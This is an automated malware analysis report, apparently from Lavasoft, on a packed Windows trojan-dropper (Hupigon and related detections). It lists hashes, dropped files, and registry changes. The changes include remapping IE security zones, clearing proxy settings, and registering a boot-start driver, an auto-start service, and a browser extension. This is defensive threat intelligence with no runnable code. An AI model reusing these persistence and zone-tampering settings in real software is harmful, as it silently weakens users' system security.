Trojan-Dropper.Win32.Agent.bjw (Kaspersky), Backdoor.Hupigon.64371 (B) (Emsisoft), Backdoor.Hupigon.64371 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Backdoor, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 079f56ead49c756a3b3252c448b9ffd5
SHA1: 591dc67706272cc3301c19bb96b10d22e6cf5573
SHA256: f75b415a68f6d0b292a9f7f2a77bbdb5ca23a78bffac69665a42a7fbe57577e1
SSDeep: 24576:mKsoFg9ZYBcIZld7XgcTmFZO6mYeVfuS/t04u1:IoFdcm8O/hnF03
Size: 846257 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: Plus HD
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
soft256.exe:2724
cnnic_1009.exe:2892
m4.exe:2840
update.exe:3408
setup.exe:2200
setup.exe:3476
setup.exe:3264
%original file name%.exe:1712
idnsvr.exe:4052
The Trojan injects its code into the following process(es):
svchost.exe:1992
File activity
The process soft256.exe:2724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\e1JePg78g.dll (33 bytes)
The process cnnic_1009.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\setup.exe (12214 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)
The process m4.exe:2840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\MP3\svchost.exe (1281 bytes)
The process update.exe:3408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\version.dat (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\uninstall.exe (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\srchsp.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\path.dat (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.exe (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.dat (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\convf.dll (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\austr.dll (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnrbtn.html (486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.sys (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cuscfg.dat (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ocinfo.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ieaux.dll (172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnreg.dll (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwrep.dat (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.ini (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (0 bytes)
The process setup.exe:2200 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\OCINS\convf.dll (1281 bytes)
%Program Files%\OCINS\replace.dat (343 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\cuscfg.dat (145 bytes)
%Program Files%\OCINS\ctrcfg.ini (230 bytes)
%Program Files%\OCINS\cnrbtn.html (486 bytes)
%System%\drivers\idnaux.sys (10 bytes)
%Program Files%\OCINS\version.dat (482 bytes)
%Program Files%\OCINS\kwrep.dat (191 bytes)
%Program Files%\OCINS\idnaux.dat (39 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\srchsp.dll (32 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)
%WinDir%\ocinfo.dat (8 bytes)
%System%\idnreg.dll (36 bytes)
%Program Files%\OCINS\addrmsg.dll (601 bytes)
%Program Files%\OCINS\addrmsg.ini (6 bytes)
The process setup.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\OCINS\cnprovh.dll (601 bytes)
%Program Files%\OCINS\convs.dll (601 bytes)
%Program Files%\OCINS\cndsv.dll (601 bytes)
%Program Files%\OCINS\config.exe (601 bytes)
%Program Files%\OCINS\cuscfg.dat (148 bytes)
%Program Files%\OCINS\ctrcfg.ini (2949 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\idnsvr.exe (601 bytes)
%Program Files%\OCINS\version.dat (479 bytes)
%Program Files%\OCINS\idnsvr.dll (601 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%Program Files%\OCINS\usrcfg.ini (21 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)
The process setup.exe:3264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.exe (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\ieaux.dll (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\version.dat (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.sys (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnreg.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\uninstall.exe (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\path.dat (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\convs.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\loader.exe (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cuscfg.dat (148 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)
The process %original file name%.exe:1712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process idnsvr.exe:4052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\OCINS\update\version.dat (482 bytes)
%Program Files%\OCINS\ctrcfg.ini (4 bytes)
%Program Files%\OCINS\austr.dll (65 bytes)
%Program Files%\OCINS\update\data2.cab (9696 bytes)
%Program Files%\OCINS\update\update.exe (273697 bytes)
%Program Files%\OCINS\update\austr.dll (1568 bytes)
%Program Files%\OCINS\usrcfg.ini (130 bytes)
Registry activity
The process soft256.exe:2724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 6A BD 7E 02 BF AD 37 FC 88 F7 6F 47 B3 F0 1D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process cnnic_1009.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 FC 7A E9 19 9A 0B 73 CD 3F F6 01 BC D3 68 3D"
[HKLM\SOFTWARE\kmedia\cnnic]
"1.0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"setup.exe" = "国际化域åÂÂÂÂæâ€Â¯æŒÂÂ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process m4.exe:2840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 32 64 65 C7 93 9C 01 27 E3 B3 E7 E3 4E 94 5F"
The process update.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F F0 AD 61 62 B6 59 56 4D 15 69 3D E1 82 EA FD"
The process setup.exe:2200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\OCINS]
"Version" = "2.6.0.42"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\idnaux]
"ErrorControl" = "1"
"ImagePath" = "system32\drivers\idnaux.sys"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"HotIcon" = "%Program Files%\OCINS\config.exe,216"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Default Visible" = "Yes"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"
[HKCR\Idnreg.IdnObj.1]
"(Default)" = "IdnObj Class"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
"(Default)" = "IEAux.IEHlprObj.1"
[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\0\win32]
"(Default)" = "%System%\idnreg.dll"
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\TypeLib]
"Version" = "1.0"
[HKCR\Idnreg.IdnObj.1\CLSID]
"(Default)" = "{61DB8FBD-B64B-401E-BDA7-F36E44180805}"
[HKCR\IEAux.IEHlprObj\CurVer]
"(Default)" = "IEAux.IEHlprObj.1"
[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\HELPDIR]
"(Default)" = "%System%\"
[HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Access Internet Keyword]
"(Default)" = "%Program Files%\OCINS\cnrbtn.html"
[HKLM\System\CurrentControlSet\Services\cnprov]
"Group" = "Boot System Extenders"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9A578C98-3C2F-4630-890B-FC04196EF420}]
"Compatibility Flags" = "1024"
[HKLM\System\CurrentControlSet\Services\idnaux]
"Type" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"CLSID" = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"
[HKLM\System\CurrentControlSet\Services\idnaux\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"
[HKCR\Idnreg.IdnObj]
"(Default)" = "IdnObj Class"
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}]
"(Default)" = "IIdnObj"
[HKLM\System\CurrentControlSet\Services\idnaux]
"DescriptionName" = "idnaux"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"MenuStatusBar" = "Chinese Navigation"
"MenuText" = "Chinese Navigation"
[HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Access Internet Keyword]
"Contexts" = "127"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"DisplayName" = "Chinese Navigation"
[HKLM\System\CurrentControlSet\Services\idnaux]
"DependOnService" = "Tcpip"
[HKCR\IEAux.IEHlprObj.1]
"(Default)" = "IEAux Class"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IEAux Class"
[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0]
"(Default)" = "idnreg 1.0 Type Library"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "yes"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\VersionIndependentProgID]
"(Default)" = "Idnreg.IdnObj"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
"(Default)" = "IEAux.IEHlprObj"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\TypeLib]
"(Default)" = "{72584095-B0B2-4058-8CDC-6AE69F8B199B}"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}]
"(Default)" = "CNNIC_IDN"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\idnaux]
"DisplayName" = "idnaux"
[HKCR\IEAux.IEHlprObj.1\CLSID]
"(Default)" = "{7605CC7C-00FD-4A5F-BAFD-828342DE6279}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Flags" = "1"
[HKLM\System\CurrentControlSet\Services\cnprov]
"DescriptionName" = "cnprov"
[HKLM\System\CurrentControlSet\Services\cnprov\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\TypeLib]
"(Default)" = "{72584095-B0B2-4058-8CDC-6AE69F8B199B}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"ButtonText" = "Chinese Navigation"
[HKLM\System\CurrentControlSet\Services\cnprov]
"ErrorControl" = "1"
[HKLM\System\CurrentControlSet\Services\idnaux]
"Group" = "PNP_TDI"
[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 B5 88 65 78 1A 57 62 B3 A9 DB D6 52 6D B3 41"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\ProgID]
"(Default)" = "Idnreg.IdnObj.1"
[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot System Extenders, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"
[HKLM\System\CurrentControlSet\Services\cnprov]
"DisplayName" = "cnprov"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"UninstallString" = "%Program Files%\OCINS\uninstall.exe"
[HKCR\Idnreg.IdnObj\CurVer]
"(Default)" = "Idnreg.IdnObj.1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Icon" = "%Program Files%\OCINS\config.exe,216"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Version" = "*"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "@\??\%System%\@c:\windows\system32\setup.exe.tmp, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3\idnsvr.exe, !\??\%Program Files%\OCINS\idnsvr.exe"
[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Idnreg.IdnObj\CLSID]
"(Default)" = "{61DB8FBD-B64B-401E-BDA7-F36E44180805}"
[HKCR\IEAux.IEHlprObj]
"(Default)" = "IEAux Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Cdfs]
"SystemRoot" = "%WinDir%"
[HKLM\System\CurrentControlSet\Services\cnprov]
"ImagePath" = "system32\drivers\cnprov.sys"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\InprocServer32]
"(Default)" = "%System%\idnreg.dll"
The following driver will be automatically launched by the OS Loader:
[HKLM\System\CurrentControlSet\Services\cnprov]
"Start" = "0"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\idnaux]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\Programmable]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\cnprov]
"InstallPath"
"DeleteFlag"
[HKCU\Console]
"KwUnSelf"
[HKLM\System\CurrentControlSet\Services\cnprov]
"SystemRoot"
[HKLM\System\CurrentControlSet\Services\idnaux]
"DeleteFlag"
The process setup.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\OCINS]
"Version" = "2.6.0.0"
[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot System Extenders, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0\0\win32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"HotIcon" = "%Program Files%\OCINS\config.exe,216"
"Default Visible" = "Yes"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\System\CurrentControlSet\Services\Cdfs]
"SystemRoot" = "%WinDir%"
[HKCR\IEAux.IEHlprObj\CurVer]
"(Default)" = "IEAux.IEHlprObj.1"
[HKLM\System\CurrentControlSet\Services\cnprov]
"ImagePath" = "system32\drivers\cnprov.sys"
"Group" = "Boot System Extenders"
[HKLM\SOFTWARE\OCINS]
"InstallPath" = "%Program Files%\OCINS"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"ButtonText" = "Chinese Navigation"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCR\TypeLib\{7605CC7B-00FD-4A5F-BAFD-828342DE6279}\1.0]
"(Default)" = "IEAux 1.0 Type Library"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"CLSID" = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"UninstallString" = "%Program Files%\OCINS\uninstall.exe"
[HKLM\System\CurrentControlSet\Services\cnprov\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"MenuStatusBar" = "Chinese Navigation"
"MenuText" = "Chinese Navigation"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"DisplayName" = "Chinese Navigation2.6.0.0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9A578C98-3C2F-4630-890B-FC04196EF420}]
"Compatibility Flags" = "1024"
[HKCR\IEAux.IEHlprObj.1]
"(Default)" = "IEAux Class"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IEAux Class"
[HKLM\System\CurrentControlSet\Services\cnprov]
"DescriptionName" = "cnprov"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "yes"
[HKCR\Interface\{7605CC7A-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IIEHlprObj"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
"(Default)" = "IEAux.IEHlprObj"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\IEAux.IEHlprObj.1\CLSID]
"(Default)" = "{7605CC7C-00FD-4A5F-BAFD-828342DE6279}"
